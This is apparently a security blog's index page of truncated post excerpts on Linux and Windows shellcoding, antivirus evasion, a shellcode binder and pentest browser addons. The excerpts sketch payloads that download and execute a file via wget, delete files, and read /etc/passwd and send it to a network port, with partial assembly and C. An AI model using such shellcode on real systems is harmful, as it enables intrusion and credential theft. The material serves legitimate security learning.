danielsauder

Here is a short write-up about my first steps about Linux (Kali in my case) 64bit shellcoding. Mostly as a reminder for myself, but maybe it helps some folks to save a little time. Hello World First I searched for two examples for a hello world shellcode for comparing them. I adjusted the examples: Get…

Problem: I had a shellcode that I compiled and used in a .c program. The compiled .c program crashed, but the executable from the assembly file worked. Normally I use this line: # objdump -d hello32|grep ‘[0-9a-f]:’|grep -v ‘file’|cut -f2 -d:|cut -f1-6 -d’ ‘|tr -s ‘ ‘|tr ‘\t’ ‘ ‘|sed ‘s/ $//g’|sed ‘s/ /\\x/g’|paste -d…

Shellcode Here is a shellcode that might run on most windows machines. I adopted code from here: http://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html so thanks to the author of that shellcode. Instead of CreateProcess I use WinExec in this example. ; Filename: winexec.asm ; Author: Daniel Sauder ; Website: https://govolution.wordpress.com/ ; License: http://creativecommons.org/licenses/by-sa/3.0/ BITS 32 global _start _start: xor ebx,…

Here are the slides from my talk at the Deepsec 2014 conference: https://deepsec.net/docs/Slides/2014/Why_Antivirus_Fails_-_Daniel_Sauder.pdf

I did not find a shellcode binder for Windows 64 bit systems, so here is my version: #include <windows.h> unsigned char sc[] = // your shellcode here typedef void (*FUNCPTR)(); int main(int argc, char **argv) { FUNCPTR func; int len; DWORD oldProtect; len = sizeof(sc); if (0 == VirtualProtect(&sc, len, PAGE_EXECUTE_READWRITE, &oldProtect)) return 1; func…

So here is just a very short one. Always when I have to set up a new pentest machine, I have to look it up again, so here is a small list of browser addons that are usefull for webapp pentesting: Wappalyzer Hackbar Firebug FoxyProxy Export Cookies ProfileSwitcher Web Developer Toolbar GroundSpeed Tamper Data ImmuniWeb

Check out my article about antivirus evasion here.

Just a short one here. This shellcode simply deletes a file with the name x. Have fun. deletefile.nasm ; Filename: deletefile.nasm ; Author: Daniel Sauder ; Website: https://govolution.wordpress.com ; Tested on: Ubuntu 12.04 / 32Bit ; License http://creativecommons.org/licenses/by-sa/3.0/ ; delete file with name x section .text global _start _start: push 0x78 ; push x, filename…

After completing the tasks for the SLEA certification, I went on writing a shellcode for downloading and executing a file. For this task I wanna use wget with execve. But first, some pseudocode: start execve wget file_x chmod +x file_x execve file_x end So that is the plan. See a problem here? Look at the…

Because it is so much fun I developed a shellcode, that reads /etc/passwd and then sends the content to 127.1.1.1 port 12345. And here it is: shellcode.c /* ; Author: Daniel Sauder ; Website: https://govolution.wordpress.com/about ; License http://creativecommons.org/licenses/by-sa/3.0/ ; Shellcode reads /etc/passwd and sends the content to 127.1.1.1 port 12345. ; The file can be…